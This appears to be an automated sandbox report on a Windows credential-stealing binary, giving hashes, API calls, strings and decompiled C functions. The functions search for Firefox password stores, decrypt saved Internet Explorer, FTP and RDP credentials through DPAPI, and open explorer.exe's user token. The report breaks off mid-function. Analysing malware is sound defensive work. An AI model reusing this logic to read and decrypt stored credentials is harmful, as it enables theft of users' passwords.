Opcode Fuzzy Hash: 774a49e7147280b3b20938a5452805c50a6a17f2c45d990b9c3d6a4dcf1db92f
Instruction Fuzzy Hash: 05C092367543082AFB80EEF35C03FDB768B4B91B48F00C435BB04990C5E8F5E49291A9

Uniqueness

Uniqueness Score: -1.00%

Function 00403DDB, Relevance: 1.5, APIs: 1, Instructions: 9
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00403DDB() {
				char _v404;
				char* _t2;

				_t2 =  &_v404;
				_push(_t2);
				_push(0x101); // executed
				L00410E90(); // executed
				return _t2;
			}

0x00403de4
0x00403dea
0x00403deb
0x00403df0
0x00403df6

APIs

WSAStartup.WSOCK32(00000101,?,?,004105E3), ref: 00403DF0

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 788b9be6feae9eeb2305b67f880ac4d482cd380d992e23d7d77878d23df068a8
Instruction ID: b39ddb2bae58422bad9ef1c852a27b00e881b3ffe9b04fce0b25c26bea8dbb9f
Opcode Fuzzy Hash: 788b9be6feae9eeb2305b67f880ac4d482cd380d992e23d7d77878d23df068a8
Instruction Fuzzy Hash: CBB092326206082AE660A2968C43AE6729D5744708F8401A52B59D12C2EAE5AA9045FA

Uniqueness

Uniqueness Score: -1.00%

Function 00410C73, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 00410C80

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c0b8540e317ed233f6ae623aefb25d1a025ca87b903b635d51881dad735b25c2
Instruction ID: a53dbb4ca493b7ef7e200f8e6b71ae19aff1122ae8d0357d8058c1ff4ff95ae7
Opcode Fuzzy Hash: c0b8540e317ed233f6ae623aefb25d1a025ca87b903b635d51881dad735b25c2
Instruction Fuzzy Hash: C7A00122B5420956E788FAB31D0A79A00830B81609F25CD2A76149A48BEDF9A0D2045D

Uniqueness

Uniqueness Score: -1.00%

Function 004017D5, Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004017D5(void* _a4) {

				if(_a4 != 0) {
					LocalFree(_a4); // executed
				}
				return 0;
			}

0x004017dc
0x004017e1
0x004017e1
0x004017e9

APIs

LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: fb9b7f913ff500385d027358800d845580eb72bb67fe42432893e3097370cae2
Instruction ID: 6fbac20c93ee8dcf72c2f2e582e4e5176c4e840c565eb3d7ca7bd60efa235b74
Opcode Fuzzy Hash: fb9b7f913ff500385d027358800d845580eb72bb67fe42432893e3097370cae2
Instruction Fuzzy Hash: 86C09B7210460856C7155F65C98579A79D85B103CCF5081357905555B1D6B8D5D0C5DC

Uniqueness

Uniqueness Score: -1.00%

Function 004017EC, Relevance: 1.3, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004017EC(intOrPtr _a4) {
				void* _t4;

				_t4 = LocalAlloc(0x40, _a4 + 0x80); // executed
				return _t4;
			}

0x004017fa
0x00401800

APIs

LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: c7da79b5d8410c9ad293d4aa48da395a822b013a6b1f115db719f7d1cd44fc81
Instruction ID: c45b4f91a8b266b6492c347f0c6a08b042b0071dba384013e78457423f248dae
Opcode Fuzzy Hash: c7da79b5d8410c9ad293d4aa48da395a822b013a6b1f115db719f7d1cd44fc81
Instruction Fuzzy Hash: 81B092B120030826E240E789C803F5A728C9B14B8CF008221BB44A6282D8ACF89045AD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00409484, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 169
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409484(signed int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t52;
				signed int _t54;
				CHAR* _t56;
				void* _t60;
				char* _t63;
				int _t65;
				char* _t68;
				int _t75;
				int _t77;
				int _t80;
				signed int _t82;
				void* _t84;
				char* _t93;
				signed int _t99;
				signed int* _t100;
				signed int _t101;

				_t99 = __ecx;
				_v332 = 0;
				_t52 = _a16;
				if(_t52 == 0 ||  *_t52 == 0) {
					L31:
					return E004017D5(_v332);
				} else {
					_t54 = E004024D7(_a16);
					__eflags = _t54;
					if(_t54 != 0) {
						_t56 = E00401D15(_a16, "*.*");
					} else {
						_t56 = E00401D15(_a16, "\*.*");
					}
					_v332 = _t56;
					E00401803( &_v324, 0x13e);
					_t60 = FindFirstFileA(_v332,  &_v324);
					_v328 = _t60;
					__eflags = _t60 + 1;
					if(_t60 + 1 != 0) {
						do {
							_t100 =  &_v324;
							__eflags =  *_t100 & 0x00000010;
							if(( *_t100 & 0x00000010) == 0) {
								_v336 =  &(_t100[0xb]);
								__eflags =  *0x415824 - 3;
								if( *0x415824 != 3) {
									_t63 = StrStrIA(_v336, "signons.sqlite");
									__eflags = _t63;
									if(_t63 != 0) {
										E004090A3(__eflags, _a4, E00401D69(E00401D15(_a16, "\\"), _v336), _a8, _a12);
										E004017D5(_t90);
									}
									_t65 = lstrlenA(_v336);
									__eflags = _t65 - 2;
									if(_t65 < 2) {
										L25:
										_push(StrStrIA(_v336, "signons.txt"));
										_push(StrStrIA(_v336, "signons2.txt"));
										_t68 = StrStrIA(_v336, "signons3.txt");
										_pop(_t101);
										_pop(_t99);
										__eflags = _t68;
										if(_t68 != 0) {
											goto L28;
										}
										__eflags = _t101;
										if(_t101 != 0) {
											goto L28;
										}
										_t99 = _t99;
										__eflags = _t99;
										if(_t99 == 0) {
											goto L29;
										}
										goto L28;
									} else {
										__eflags =  *((short*)( &(_v336[_t65]) - 2)) - 0x732e;
										if( *((short*)( &(_v336[_t65]) - 2)) != 0x732e) {
											goto L25;
										}
										L28:
										E0040912E(__eflags, _a4, E00401D69(E00401D15(_a16, "\\"), _v336), _a8, _a12);
										E004017D5(_t71);
										goto L29;
									}
								}
								_t93 = StrStrIA(_v336, "prefs.js");
								__eflags = _t93;
								if(_t93 != 0) {
									E00403E4C(_a4, E00401D69(E00401D15(_a16, "\\"), _v336), 0xbeef0001);
									E004017D5(_t96);
								}
								goto L29;
							}
							_t77 = lstrcmpiA(0x414806,  &(_t100[0xb]));
							__eflags = _t77;
							if(_t77 != 0) {
								_t80 = lstrcmpiA(0x414808,  &( &_v324->cFileName));
								__eflags = _t80;
								if(_t80 != 0) {
									_t82 = E004024D7(_a16);
									__eflags = _t82;
									if(_t82 != 0) {
										_t84 = E00401D15(_a16, 0);
									} else {
										_t84 = E00401D15(_a16, "\\");
									}
									E00409484(_t99, _a4, _a8, _a12, E00401D69(_t84,  &( &_v324->cFileName)));
									E004017D5(_t85);
								}
							}
							L29:
							_t75 = FindNextFileA(_v328,  &_v324);
							__eflags = _t75;
						} while (_t75 != 0);
						FindClose(_v328);
					}
					goto L31;
				}
			}

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 004094F4
lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00409521
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 0040953E
FindNextFileA.KERNEL32(?,?,00000000,00000000,?,?,004140DA,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite), ref: 004096D4
FindClose.KERNEL32(?,?,?,00000000,00000000,?,?,004140DA,00000000,?,signons2.txt,00000000,?,signons.txt,?,?), ref: 004096E7

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Strings

*.*, xrefs: 004094C3
prefs.js, xrefs: 004095AD
\*.*, xrefs: 004094B4
signons3.txt, xrefs: 0040967B
signons.txt, xrefs: 00409659
signons.sqlite, xrefs: 004095F3
signons2.txt, xrefs: 0040966A

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
API String ID: 3040542784-1405255088
Opcode ID: a56a53706eb00f5ef4618a8b98f3ad676a585cd1c48dc3f9a5d8324fea737ce5
Instruction ID: b663840663784a3fe1e581d68bb3c28c37a014c69344c9f8a2cf847aa5b90957
Opcode Fuzzy Hash: a56a53706eb00f5ef4618a8b98f3ad676a585cd1c48dc3f9a5d8324fea737ce5
Instruction Fuzzy Hash: 77514F71510109BADF226F62DC02AEE7A79AF54308F1444BBB408B50F2D67E9DE09E5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1A9, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040A1A9(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v1028;
				char _v2052;
				int _v2056;
				int _v2060;
				intOrPtr _v2064;
				char _v2068;
				char _v2072;
				char _v2076;
				void* _v2080;
				char _v2084;
				void* _v2088;
				char _v2092;
				intOrPtr _v2096;
				void* _t53;
				int _t58;

				E00409EFB(_a4,  &_v1028, _a20);
				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0);
				_v2068 = 0x10;
				_v2064 = 2;
				_v2060 = 0;
				_v2056 = 0;
				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0);
				if(_v2076 == 0 || _v2072 == 0) {
					return _t53;
				}
				_v2096 = 0xbeef0000;
				if(lstrcmpiA( &_v1028, "Internet Explorer") == 0) {
					L5:
					_t58 = StrStrIA( &_v2052, "DPAPI: ");
					if(_t58 == 0) {
						_t58 = E0040A13B(_v2096, _a12, _v2072, _v2076, _a16);
					} else {
						if( *0x41442d != 0) {
							_push(_v2076);
							_pop( *_t29);
							_push(_v2072);
							_pop( *_t31);
							_t58 =  *0x41442d( &_v2084, 0, 0, 0, 0, 1,  &_v2092);
							if(_t58 != 0) {
								E0040A13B(_v2096, _a12, _v2088, _v2092, _a16);
								_t58 = LocalFree(_v2088);
							}
						}
					}
					L11:
					_push(_v2072);
					L00410DCA();
					return _t58;
				}
				_v2096 = 0xbeef0001;
				if(lstrcmpiA( &_v1028, "WininetCacheCredentials") == 0) {
					goto L5;
				}
				_v2096 = 0xbeef0002;
				_t58 = lstrcmpiA( &_v1028, "MS IE FTP Passwords");
				if(_t58 != 0) {
					goto L11;
				}
				goto L5;
			}

APIs

Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A1DD
lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A267
lstrcmpiA.KERNEL32(?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A286
lstrcmpiA.KERNEL32(?,MS IE FTP Passwords,?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A2A5
StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A2BE
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A304
LocalFree.KERNEL32(?), ref: 0040A331
CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A35B

Strings

Internet Explorer, xrefs: 0040A25B
DPAPI: , xrefs: 0040A2B2
MS IE FTP Passwords, xrefs: 0040A299
WininetCacheCredentials, xrefs: 0040A27A

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
API String ID: 2957877119-3076635702
Opcode ID: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
Instruction ID: d0109d7229b507364c02bffd69db74d2b73ca55b941890eea464c4d2f255e551
Opcode Fuzzy Hash: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
Instruction Fuzzy Hash: CE415E7240021DEADF219F50CC42FDA77B9BF08304F0480E6B64475190DB759AE58FD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA2E, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040BA2E(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				int _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _v40;
				void* _v44;
				char _v48;
				void* _v52;
				int _v56;
				char* _v60;
				void* _t55;
				void* _t56;
				int _t77;
				int _t78;

				_t55 = __eax;
				if(_a16 == 0 ||  *0x41442d == 0) {
					return _t55;
				} else {
					_t56 = _a16;
					__eflags =  *0x41914c - _t56; // 0x0
					if(__eflags < 0) {
						__eflags =  *0x419150 - _t56; // 0x5
						if(__eflags < 0) {
							__eflags =  *0x419154 - _t56; // 0x3
							if(__eflags < 0) {
								E0040B1AB(_a12,  *0x41914c,  &_v8,  &_v12,  &_v16);
								E0040B1AB(_a12,  *0x419154,  &_v20,  &_v24,  &_v28);
								E0040B1AB(_a12,  *0x419150,  &_v32,  &_v36,  &_v40);
								_push(_v32);
								_pop( *_t16);
								_push(_v40);
								_pop( *_t18);
								_v52 = 0;
								_t56 =  *0x41442d( &_v48, 0, 0, 0, 0, 1,  &_v56);
								__eflags = _t56;
								if(_t56 != 0) {
									__eflags = _v52;
									if(_v52 != 0) {
										__eflags = _v56 - _v32;
										if(_v56 <= _v32) {
											asm("cld");
											asm("jecxz 0x4");
											memcpy(_v40, _v52, _v56);
											_push(_v56);
											_pop( *_t29);
											_t56 = LocalFree(_v52);
											__eflags = _v8;
											if(_v8 != 0) {
												__eflags = _v20;
												if(_v20 != 0) {
													__eflags = _v32;
													if(_v32 != 0) {
														_v60 = E004017EC(_v8);
														E00401823(_v16, _v60, _v8);
														_t77 = StrCmpNIA(_v60, "ftp://", lstrlenA("ftp://"));
														__eflags = _t77;
														if(_t77 != 0) {
															_t77 = StrCmpNIA(_v60, "http://", lstrlenA("http://"));
														}
														_t78 = _t77;
														__eflags = _t78;
														if(_t78 != 0) {
															_t78 = StrCmpNIA(_v60, "https://", lstrlenA("https://"));
														}
														__eflags = _t78;
														if(_t78 == 0) {
															E00401486(_a8, _a20);
															E00401486(_a8,  *0x419148);
															E004014BC(_a8, _v16, _v8);
															E004014BC(_a8, _v28, _v20);
															E004014BC(_a8, _v40, _v32);
														}
														return E004017D5(_v60);
													}
												}
											}
										}
									}
								}
							}
						}
					}
					return _t56;
				}
			}

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BAE5
LocalFree.KERNEL32(00000000,?), ref: 0040BB20
lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB61
StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB6F
lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB7D
StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB8B
lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB99
StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA7

Strings

http://, xrefs: 0040BB78, 0040BB83
ftp://, xrefs: 0040BB5C, 0040BB67
https://, xrefs: 0040BB94, 0040BB9F

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotect
String ID: ftp://$http://$https://
API String ID: 3968356742-2804853444
Opcode ID: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
Instruction ID: bf0502dff25623896b3ecf7b6da0d74d92ec6f4b9260b97e51de09929ef1935b
Opcode Fuzzy Hash: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
Instruction Fuzzy Hash: 9E51E772900209FBDF12AF91ED45EEE7B7AEB48314F108136F510B11A1D7799A90EB98

Uniqueness

Uniqueness Score: -1.00%

Function 00402C05, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 105
registryprocessCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00402C05(void* __eax, void* __edx, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				char _v276;
				long _v304;
				void* _v312;
				void* _v316;
				int _v320;
				int _v324;
				void* _t33;
				int _t36;
				void* _t44;
				void* _t47;
				int* _t56;
				void* _t60;
				int _t64;

				if( *0x4143d1 == 0 ||  *0x4143d5 == 0 ||  *0x41440d == 0 ||  *0x414411 == 0) {
					return 0;
				} else {
					_t60 = 0;
					_v16 =  *0x4143d1();
					_v312 = 0x128;
					_t33 = CreateToolhelp32Snapshot(2, 0);
					if(_t33 != 0xffffffff) {
						_v316 = _t33;
						_t36 = Process32First(_v316,  &_v312);
						while(_t36 != 0) {
							if(StrStrIA( &_v276, "explorer.exe") == 0) {
								L23:
								_t36 = Process32Next(_v316,  &_v312);
								continue;
							} else {
								_v320 = 0;
								_t44 =  *0x4143d5(_v304,  &_v320);
								_t64 = _v320;
								if(_t44 == 0 || _t64 != _v16) {
									goto L23;
								} else {
									_t47 = OpenProcess(0x2000000, 0, _v304);
									if(_t47 == 0) {
										goto L23;
									} else {
										_v12 = _t47;
										_push( &_v8);
										_push(0x201eb);
										_push(_v12);
										if( *0x41440d() == 0) {
											CloseHandle(_v12);
											goto L23;
										} else {
											_push(_v8);
											if( *0x414411() == 0) {
												CloseHandle(_v8);
												CloseHandle(_v12);
												goto L23;
											} else {
												_t60 = _t60 + 1;
												_v324 = 0;
												_t56 =  &_v324;
												_push(_t56);
												_push(0xf003f);
												L00410E12();
												if(_t56 == 0 && _v324 != 0) {
													_push(_v324);
													_pop( *0x4140fe);
												}
												if(_a4 != 0) {
													_push(_v8);
													_pop( *__eax);
												}
											}
										}
									}
								}
							}
							break;
						}
						CloseHandle(_v316);
					}
					return _t60;
				}
			}

0x00402c1c
0x00402c3d
0x00402c40
0x00402c40
0x00402c48
0x00402c4b
0x00402c59
0x00402c61
0x00402c67
0x00402c7a
0x00402c7f
0x00402c9a
0x00402d73
0x00402d80
0x00000000
0x00402ca0
0x00402ca0
0x00402cb7
0x00402cbd
0x00402cc5
0x00000000
0x00402cd4
0x00402ce6
0x00402ce8
0x00000000
0x00402cee
0x00402cee
0x00402cf4
0x00402cf5
0x00402cfa
0x00402d05
0x00402d6e
0x00000000
0x00402d07
0x00402d07
0x00402d12
0x00402d5c
0x00402d64
0x00000000
0x00402d14
0x00402d14
0x00402d15
0x00402d1f
0x00402d25
0x00402d26
0x00402d2b
0x00402d32
0x00402d3d
0x00402d43
0x00402d43
0x00402d4e
0x00402d50
0x00402d53
0x00402d53
0x00402d55
0x00402d12
0x00402d05
0x00402ce8
0x00402cc5
0x00000000
0x00402c9a
0x00402d90
0x00402d90
0x00402d99
0x00402d99

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00402C59
Process32First.KERNEL32 ref: 00402C7A
StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90

Strings

explorer.exe, xrefs: 00402C87

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Open$CloseCreateCurrentFirstHandleProcessProcess32SnapshotToolhelp32User
String ID: explorer.exe
API String ID: 2079391467-3187896405
Opcode ID: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
Instruction ID: ccbd0d7988a87a0baa37139996db17261bf584517116b24148bb5ef45f8ddf5c
Opcode Fuzzy Hash: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
Instruction Fuzzy Hash: 15418B72900218ABDF219F61DD4ABDE7AB5AF04304F0085B6A104B51E1EBFC9ED1DE58

Uniqueness

Uniqueness Score: -1.00%

Function 00408789, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408789(void* __ecx, intOrPtr _a4, char* _a8, char* _a12) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t36;
				signed int _t38;
				CHAR* _t40;
				void* _t44;
				char* _t47;
				int _t50;
				int _t52;
				int _t55;
				signed int _t57;
				void* _t59;
				void* _t68;
				signed int* _t69;

				_t68 = __ecx;
				_v332 = 0;
				_t36 = _a8;
				if(_t36 == 0 ||  *_t36 == 0) {
					L20:
					return E004017D5(_v332);
				} else {
					_t38 = E004024D7(_a8);
					__eflags = _t38;
					if(_t38 != 0) {
						_t40 = E00401D15(_a8, "*.*");
					} else {
						_t40 = E00401D15(_a8, "\*.*");
					}
					_v332 = _t40;
					E00401803( &_v324, 0x13e);
					_t44 = FindFirstFileA(_v332,  &_v324);
					_v328 = _t44;
					__eflags = _t44 + 1;
					if(_t44 + 1 != 0) {
						do {
							_t69 =  &_v324;
							__eflags =  *_t69 & 0x00000010;
							if(( *_t69 & 0x00000010) == 0) {
								_v336 =  &(_t69[0xb]);
								_t47 = StrStrIA(_v336, _a12);
								__eflags = _t47;
								if(_t47 != 0) {
									E00408744(_t69, __eflags, _a4, E00401D69(E00401D15(_a8, "\\"), _v336));
									E004017D5(_t65);
								}
							} else {
								_t52 = lstrcmpiA(0x414806,  &(_t69[0xb]));
								__eflags = _t52;
								if(_t52 != 0) {
									_t55 = lstrcmpiA(0x414808,  &( &_v324->cFileName));
									__eflags = _t55;
									if(_t55 != 0) {
										_t57 = E004024D7(_a8);
										__eflags = _t57;
										if(_t57 != 0) {
											_t59 = E00401D15(_a8, 0);
										} else {
											_t59 = E00401D15(_a8, "\\");
										}
										E00408789(_t68, _a4, E00401D69(_t59,  &( &_v324->cFileName)), _a12);
										E004017D5(_t60);
									}
								}
							}
							_t50 = FindNextFileA(_v328,  &_v324);
							__eflags = _t50;
						} while (_t50 != 0);
						FindClose(_v328);
					}
					goto L20;
				}
			}

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 004087F9
lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00408822
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 0040883F
FindNextFileA.KERNEL32(?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 004088E6
FindClose.KERNEL32(?,?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 004088F9

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Strings

*.*, xrefs: 004087C8
\*.*, xrefs: 004087B9

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: 12ad2d7aacd0b406b1fd84168847851b3bc033d94df53cf634eb985907b76e9d
Instruction ID: 3c8cc9b50cd0f0f031436ee2fa180d1129fc000271da3e07714d4956bd7e6d77
Opcode Fuzzy Hash: 12ad2d7aacd0b406b1fd84168847851b3bc033d94df53cf634eb985907b76e9d
Instruction Fuzzy Hash: 53314072500209AADF21BF62CD02BEE7775AF44314F5480BBB548B60B1DB7C9E909F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEA2, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040CEA2(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				signed char _v24;
				CHAR* _v28;
				signed char _v32;
				void* _v36;
				char _v40;
				void* _v44;
				char _v48;
				signed char _t40;
				signed char _t43;
				signed char _t51;
				signed char _t53;
				signed char _t55;
				signed char _t59;
				signed char _t64;
				signed char _t65;
				char _t66;

				if( *0x41442d != 0) {
					_t40 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t40;
					if(_t40 != 0) {
						__eflags = _v8 - 0x100000;
						if(_v8 >= 0x100000) {
							L23:
							return E00401FB0( &_v20);
						}
						_t43 = E004022C7(_v12, _v8);
						__eflags = _t43;
						if(_t43 != 0) {
							goto L23;
						}
						_v24 = E0040CDD0("username:s:", _v12, _v8);
						_v28 = E0040CDD0("password 51:b:", _v12, _v8);
						_v32 = E0040CDD0("full address:s:", _v12, _v8);
						__eflags = _v24;
						if(_v24 == 0) {
							L22:
							E004017D5(_v24);
							E004017D5(_v28);
							E004017D5(_v32);
							goto L23;
						}
						__eflags = _v28;
						if(_v28 == 0) {
							goto L22;
						}
						__eflags = _v32;
						if(_v32 != 0) {
							_t51 = lstrlenA(_v28);
							_t64 = _t51 >> 1;
							_push(_t64);
							while(1) {
								_t65 = _t64;
								__eflags = _t65;
								if(_t65 == 0) {
									break;
								}
								asm("lodsw");
								__eflags = _t51 - 0x30;
								if(_t51 < 0x30) {
									L12:
									_t53 = _t51 - 0x41 + 0xa;
									__eflags = _t53;
									L13:
									__eflags = _t53 - 0x30;
									if(_t53 < 0x30) {
										L16:
										_t55 = _t53 - 0x41 + 0xa;
										__eflags = _t55;
										L17:
										_t51 = _t55 << 0x00000004 | _t55 << 0x00000004;
										asm("stosb");
										_t64 = _t65 - 1;
										__eflags = _t64;
										continue;
									}
									__eflags = _t53 - 0x39;
									if(_t53 > 0x39) {
										goto L16;
									}
									_t55 = _t53 - 0x30;
									goto L17;
								}
								__eflags = _t51 - 0x39;
								if(_t51 > 0x39) {
									goto L12;
								}
								_t53 = _t51 - 0x30;
								goto L13;
							}
							_pop(_t66);
							_v40 = _t66;
							_push(_v28);
							_pop( *_t22);
							_v44 = 0;
							_t59 =  *0x41442d( &_v40, 0, 0, 0, 0, 1,  &_v48);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags = _v44;
